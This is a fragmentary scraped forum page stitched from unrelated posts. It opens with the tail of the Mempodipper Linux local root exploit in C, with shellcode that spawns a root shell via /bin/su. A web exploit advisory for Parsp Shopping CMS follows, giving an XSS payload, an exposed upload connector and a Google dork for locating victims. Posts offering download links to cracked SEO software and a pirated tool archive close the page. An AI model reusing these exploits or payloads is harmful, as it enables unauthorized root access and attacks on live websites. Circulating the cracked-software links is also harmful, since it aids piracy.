printf("= Jan 21, 2012 =\n");
printf("===============================\n\n");
int parent_pid = getpid();
if (fork()) {
printf("[+] Waiting for transferred fd in parent.\n");
int fd = recv_fd();
printf("[+] Received fd at %d.\n", fd);
if (fd < 0) {
perror("[-] recv_fd");
return -1;
}
printf("[+] Assigning fd %d to stderr.\n", fd);
dup2(2, 6);
dup2(fd, 2);
unsigned long address;
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
address = strtoul(argv[2], NULL, 16);
else {
printf("[+] Reading su for exit@plt.\n");
// Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
FILE *command = popen("objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
char result[32];
result[0] = 0;
fgets(result, 32, command);
pclose(command);
address = strtoul(result, NULL, 16);
if (address == ULONG_MAX || !address) {
printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
return 1;
}
printf("[+] Resolved exit@plt to 0x%lx.\n", address);
}
printf("[+] Calculating su padding.\n");
FILE *command = popen("su this-user-does-not-exist 2>&1", "r");
char result[256];
result[0] = 0;
fgets(result, 256, command);
pclose(command);
unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
unsigned long offset = address - su_padding;
printf("[+] Seeking to offset 0x%lx.\n", offset);
lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
// See shellcode-32.s in this package for the source.
char shellcode[] =
"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
"\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
"\x80";
#elif defined(__x86_64__)
// See shellcode-64.s in this package for the source.
char shellcode[] =
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
printf("[+] Executing su with shellcode.\n");
execl("/bin/su", "su", shellcode, NULL);
} else {
char pid[32];
sprintf(pid, "%d", parent_pid);
printf("[+] Executing child from child fork.\n");
execl("/proc/self/exe", argv[0], "-c", pid, NULL);
}
}Sursa: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
- 1
-
Parsp Shopping CMS [V5] Multiple Vulnerability
# Exploit Title: Parsp Shopping CMS [V5] Multiple Vulnerability
# Date: 2012-01-22 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.parsp.com/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"powered by www.parsp.com V5"
# Version : [5]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- NoL1m1t (nol1m1t [at] rocketmail [dot] com)
-----------------------------------------------------------------------------------------
Parsp Shopping CMS [V4] Multiple Vulnerability
-----------------------------------------------------------------------------------------
Author : BHG Security Center
Date : 2012-01-22
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
------------- ( WYSIWYG Editor ) ~
~ [PoC]Http://[victim]/path/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Allowed formats for uploading ~
$Config['AllowedExtensions']['File'] = array( "zip", "rar", "pdf", "doc", "xls", "csv" );
$Config['AllowedExtensions']['Image'] = array( "jpg", "gif", "jpeg", "png" );
$Config['AllowedExtensions']['Flash'] = array( "swf", "fla" );
$Config['AllowedExtensions']['Media'] = array( "swf", "fla", "jpg", "gif", "jpeg", "png", "avi", "mpg", "mpeg" );
Unauthorized extension
$Config['DeniedExtensions']['File'] = array( "html", "htm", "php", "php2", "php3", "php4", "php5", "phtml", "pwml", "inc", "asp", "aspx", "ascx", "jsp", "cfm", "cfc", "pl", "bat", "exe", "com", "dll", "vbs", "js", "reg", "cgi", "htaccess", "asis", "sh", "shtml", "shtm", "phtm" );
------------- ( Cross Site Scripting ) ~
~ [PoC] ~: Http://[victim]/path/index.php?advanced_search_in_category=[XSS]&categoryID=13&search=1&search_in_subcategory=1&search_name=&search_price_from=&search_price_to=
Note: URL encoded GET input advanced_search_in_category was set to ' onmouseover=prompt(923419) bad='
-------------( Error message on page For Find Directory Address ) ~
~ [PoC]Http://[victim]/path/printable.php
Note:User and account information on the site intended for attacks burteforce
-------------( PHPinfo page Information ) ~
~ [PoC]Http://[victim]/path/phpinfo.php
Note:Full information about the Php installed on the server
Timeline:
~~~~~~~~~
- 21 - 01 - 2012 bug found.
- 21 - 01 - 2012 vendor contacted, but no response.
- 22 - 01 - 2012 Advisories release.
Important Notes:
~~~~~~~~~
- Vendor did not respond to the email as well as the phone. As there
is not any contact form or email address in
- the website, we have used all the emails which had been found by
searching in Google such as support, info, and so on.
---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | ArYaIeIrAN | NoL1m1t | G3n3Rall
Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | Cyber C0der And All My Friendz
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ
-------------------------------- [ EOF ] ---------------------------------- -
Salespage: SEnuke X SEO Software - The World's First Money Making Machine
Senukex is one of the most advanced link building tools ever developed in the internet marketing field. It is the version 2 of the hugely popular senuke tool. It is developed by Areeb Bajwa and Joe Russel. Senuke helps You to create web2.0 accounts, create forum profiles, create bookmarking accounts and bookmark urls, do keyword research and more. Let's see everything in detail very soon in this senukex review. Ready fully to have a through understanding of senukex.
Download:
http://www.multiupload.com/I5KXT9WM0U
Mirror:
http://www.mirrorcreator.com/files/01F0ZXUO/SenukeX-242.rar_links
Virus Scan:
https://www.virustotal.com/file/721ce331ce390ec5c16a28579207259e0c8e39f405bdf4dacf4b61b50514dde2/analysis/
-
Interesant chiar nu stiam asta
-
Ti-am dat PM.
-
Nici nu mai zic nimic!
-
-
The membership only site: Crackit.info - FREE Crack Downloads | Best SEO & Internet Marketing Tools
The site charges $67 to download all it's content.
All products included [updated 12/1/2012]
Download [978 MB]
D6fxqOzdy0pR3=3=nrSFwoldDmlbw0LKEoxR+dQS+4kbJQ55
(crypted once)
If you want this product download it ASAP as the links are taken down pretty quickly.
Ez Album Blind SQL Injection Vulnerability
in Exploituri
Posted
Ez Album Blind SQL Injection Vulnerability
Sursa: Ez Album Blind SQL Injection Vulnerability